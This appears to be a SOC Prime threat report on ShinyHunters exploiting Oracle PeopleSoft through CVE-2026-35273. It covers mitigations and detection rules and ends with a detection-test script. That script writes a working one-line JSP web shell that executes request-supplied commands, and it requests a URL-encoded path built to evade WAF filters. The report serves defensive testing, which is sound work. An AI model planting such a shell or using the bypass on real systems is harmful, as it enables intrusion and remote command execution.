SOC Prime Bias: Critical

01 Oct 2026 07:53 UTC

ShinyHunters Resumes Large-Scale Attacks Targeting Oracle PeopleSoft

Author Photo
SOC Prime Team linkedin icon Follow
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

The threat actor UNC6240 (ShinyHunters) has resumed large-scale exploitation of Oracle PeopleSoft systems through CVE-2026-35273. The campaign leverages URL-encoded paths to circumvent Web Application Firewalls (WAF) and access the vulnerable Environment Management Hub endpoint. Attackers deploy multiple web shells alongside the SIDEEYE backdoor to establish persistence, maintain unauthorized access, and facilitate data exfiltration.

Investigation

Mandiant and Google Threat Intelligence Group documented a transition from zero-day exploitation in June 2026 to N-day attacks against unpatched environments. Researchers identified the use of URL-encoding (/%50SEMHUB/) to bypass string-based WAF filtering. Analysis revealed a recurring attack sequence involving target validation through serialized Java objects, followed by the deployment of trojanized installers and tunneling utilities.

Mitigation

Organizations should immediately install the Oracle Security Alert patch addressing CVE-2026-35273 and disable or remove the PSEMHUB application. WAF configurations should inspect and block normalized URL paths instead of relying exclusively on literal string matching. Security teams should also rotate credentials accessible from the web tier and examine application directories for suspicious or unauthorized files.

Response

If a web shell is discovered, defenders should consider the affected host fully compromised and preserve forensic evidence before remediation. Enable host-level auditing to identify unexpected shell processes launched by the WebLogic Java process. Rotate exposed credentials, including database connection strings and cloud credentials, while reviewing outbound network activity for known C2 indicators.

Attack Flow

We are still updating this part.

Detections

Possible System Enumeration (via cmdline)

SOC Prime Team
29 Sep 2026

Suspicious Command and Control by Unusual Top Level Domain (TLD) DNS Request (via dns)

SOC Prime Team
29 Sep 2026

Possible Base64 Encoded Strings Manipulation (via cmdline)

SOC Prime Team
29 Sep 2026

Remote File Upload / Download via Standard Tools (via cmdline)

SOC Prime Team
29 Sep 2026

IOCs (HashSha256) to detect: ShinyHunters Renewed Mass Exploitation Campaign Targeting Oracle PeopleSoft

SOC Prime AI Rules
29 Sep 2026

IOCs (SourceIP) to detect: ShinyHunters Renewed Mass Exploitation Campaign Targeting Oracle PeopleSoft

SOC Prime AI Rules
29 Sep 2026

IOCs (DestinationIP) to detect: ShinyHunters Renewed Mass Exploitation Campaign Targeting Oracle PeopleSoft

SOC Prime AI Rules
29 Sep 2026

Web Shell Deployment via Exploitation of CVE-2026-35273 [Windows Process Creation]

SOC Prime AI Rules
29 Sep 2026

UNC6240 Exploitation of Oracle PeopleSoft using Web Shells [Webserver]

SOC Prime AI Rules
29 Sep 2026

Simulation Execution

  • Attack Narrative & Commands: The adversary identifies an Oracle PeopleSoft instance and seeks to exploit a vulnerability. To bypass simple WAF signatures looking for the string “PSEMHUB”, the attacker uses URL encoding to request /%50SEMHUB/. Upon successful exploitation, the attacker drops a web shell named x.jsp into the web root to provide a persistent interface for command execution. This sequence mimics the specific indicators of compromise (IOCs) identified in the UNC6240 exploitation campaign.

  • Regression Test Script:

    #!/bin/bash
    # Simulation Script for UNC6240 Web Shell Detection
    
    # 1. Define paths (Adjust based on target environment)
    WEB_ROOT="/var/www/html"
    SHELL_NAME="x.jsp"
    TARGET_URL="http://localhost/%50SEMHUB/"
    
    echo "[+] Creating simulated web shell: $WEB_ROOT/$SHELL_NAME"
    # Create a simple JSP web shell content
    echo '<% out.print(new java.util.Scanner(Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream()).useDelimiter("\A").next()); %>' | sudo tee $WEB_ROOT/$SHELL_NAME > /dev/null
    
    echo "[+] Triggering detection via URL-encoded request..."
    # Use curl to request the encoded path to generate the log entry
    curl -s "$TARGET_URL" > /dev/null
    
    echo "[+] Simulation complete. Check SIEM for detection."
  • Cleanup Commands:

    #!/bin/bash
    # Cleanup Script
    
    WEB_ROOT="/var/www/html"
    SHELL_NAME="x.jsp"
    
    echo "[+] Cleaning up simulation files..."
    sudo rm -f $WEB_ROOT/$SHELL_NAME
    echo "[+] Cleanup finished."